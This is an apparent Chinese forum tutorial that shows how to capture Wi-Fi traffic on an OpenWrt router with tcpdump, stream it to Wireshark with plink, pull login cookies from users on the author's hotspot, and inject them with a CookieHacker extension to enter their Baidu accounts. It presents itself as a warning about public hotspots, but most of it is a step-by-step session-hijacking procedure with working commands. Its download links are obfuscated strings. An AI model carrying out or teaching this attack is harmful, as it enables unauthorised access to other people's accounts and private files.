本教程主要想说明一点，
在使用公共热点时，你的信息是多么的不安全

1.openwrt路由下安装 tcpdump
opkg update
opkg install tcpdump
复制代码

2.电脑装wireshark 和plink.exe
f93K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2%4K9i4u0W2M7$3S2S2M7X3E0Q4x3X3g2G2M7X3N6Q4x3V1k6V1L8%4N6F1L8r3!0S2k6q4)9J5k6h3S2@1L8h3H3`.
fefK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3y4Z5K9h3q4J5K9#2)9J5k6h3N6J5k6h3g2F1k6h3&6V1i4K6u0W2L8%4u0Y4i4K6u0W2N6h3E0Q4x3V1k6Q4y4@1g2K6k6%4c8S2N6r3S2S2L8g2)9J5c8Y4m8#2N6s2c8&6i4K6u0r3k6r3!0%4L8X3I4G2j5h3c8Q4x3X3g2Z5N6r3#2D9

3.路由下tcpdump抓包，PC端使用 wireshark 实时监听
plink.exe -ssh -pw admin root@192.168.4.1 "tcpdump -ni wlan0 -s 0 -w - not port 22" | "C:\Program Files\Wireshark\Wireshark.exe" -k -i -
复制代码
admin 是路由的密码，root是用户名 ，wlan0 无线网卡 的数据链路层代号，
ifconfig 可以看到具体详细信息，tcpdump的指令就不多说了，看官方文档吧

4.分析数据报文，获取敏感信息

假如你使用了我的wifi，登录了百度的主页，我就获取你的登录cookies，
有了cookies可以不用密就能登录你的百度账号， 浏览你的各种百度云盘里面的内容。

wireshark 添加过滤的条件“http.cookie“， 获取cookies的相关报文，点中右键，follow tcp steam，看到完整的报文，

复制 http 请求时向服务器发送的cookies 字符串

5.注入cookies，登录账号
chrome 下使用一个 CookieHacker的插件 ，下载 989K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3g2$3K9h3I4U0L8%4y4Q4x3X3g2E0k6g2)9J5c8W2)9K6c8Y4m8Q4x3@1b7K6y4U0j5`.
打开 baidu.com，把cookies的字符串粘贴，点击inject cookie

刷新一下就看到用户已经登录了
P.S. 除了这些以外，你发出的所有请求都能在wireshark里面分析出来，当然这只是最简单的嗅探而已，有时间会继续写下去

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课